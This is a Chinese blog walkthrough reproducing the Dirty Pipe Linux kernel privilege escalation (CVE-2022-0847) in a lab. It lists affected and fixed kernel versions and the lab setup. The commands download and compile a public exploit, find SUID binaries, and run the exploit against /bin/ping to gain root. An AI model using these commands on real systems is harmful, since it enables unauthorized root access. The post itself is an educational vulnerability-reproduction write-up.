漏洞复现#CVE-2022-0847(Linux内核提权)

admin 2023年3月20日22:21:54评论100 views字数 1360阅读4分32秒阅读模式

漏洞复现#CVE-2022-0847(Linux内核提权)
点击上方蓝字  关注安全知识



1.1 前言

影响范围:5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102

可覆盖重写任意可读文件中的数据,可将普通权限的用户提升到特权 root

具体漏洞相关信息:脏管道漏洞 — 脏管道漏洞文档 (dirtypipe-cm4all-com.translate.goog)

环境:最好是ubuntu 16.04 或18.04(#我推荐使用18.04,我在配置的时候16.04问题比较多#下载链接:Index of /ubuntu-releases/18.04/ (zju.edu.cn)

环境配置时间可能较长,可以同上面链接,了解漏洞,如何产生以及漏洞特性。

1.2环境检查

使用uname -r命令,查看当前内核版本,一般在 5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102版本以内,可以受影响。在配置前后版本不一样。配置前版本都会有所不同

1.3环境搭建

git clone https://github.com/brant-ruan/metarget.git

cd metarget/

pip3 install -r requirements.txt  #上面三条命令是为了安装metarget项目

sudo ./metarget cnv install cve-2022-0847 #安装你想要的漏洞,当然我们这里是Dirtypipe

如果你使用的是linux18.04版本安装起来应该是没什么问题,由于我已经安装过了,所以这里不展示效果。

当我们安装好以后版本应该是这样

         漏洞复现#CVE-2022-0847(Linux内核提权)

1.4漏洞复现(两个方法)

方法一:

git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit

cd CVE-2022-0847-DirtyPipe-Exploit

使用这两条命令将POC弄下来

漏洞复现#CVE-2022-0847(Linux内核提权)

好的失败了,那位大佬的文章的一样没成功,我抱着侥幸的心里试试,也不行。

方法二:

mkdir dirtypipez

cd dirtypipez

wget https://haxx.in/files/dirtypipez.c

gcc dirtypipez.c -o dirtypipez

按照代码来输入,我们直接来看运行效果:

         

漏洞复现#CVE-2022-0847(Linux内核提权)

可以看到成功下载,但是这个POC需要有一个具有SUID权限的可执行文件,在利用这个文件进行提权,你可以自己写也可以使用命令找,例如:

find / -perm -u=s -type f 2>/dev/null

         

漏洞复现#CVE-2022-0847(Linux内核提权)

可以看到有很多,你可以找一个你看的顺眼的,我这里使用的是/bin/ping

         

漏洞复现#CVE-2022-0847(Linux内核提权)

         

./dirtypipez /bin/ping

执行命令以后我们就提权成功了

         

漏洞复现#CVE-2022-0847(Linux内核提权)

lLinux 内核 >= 5.16.11

lLinux 内核 >= 5.15.25

lLinux 内核 >= 5.10.102

内核在这几个版本内,已经是安全的了

本篇文章用于记录和学习,也希望能够帮助到一些人.

下一篇,研究这个漏洞具体实现,知其然,知其所以然.




往期精选



围观

PHP代码审计学习

丨更多

热文

浅谈应急响应

丨更多

·end·

—如果喜欢,快分享给你的朋友们吧—

我们一起愉快的玩耍吧



原文始发于微信公众号(Rot5pider安全团队):漏洞复现#CVE-2022-0847(Linux内核提权)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月20日22:21:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现#CVE-2022-0847(Linux内核提权)https://cn-sec.com/archives/1616322.html

发表评论

匿名网友 填写信息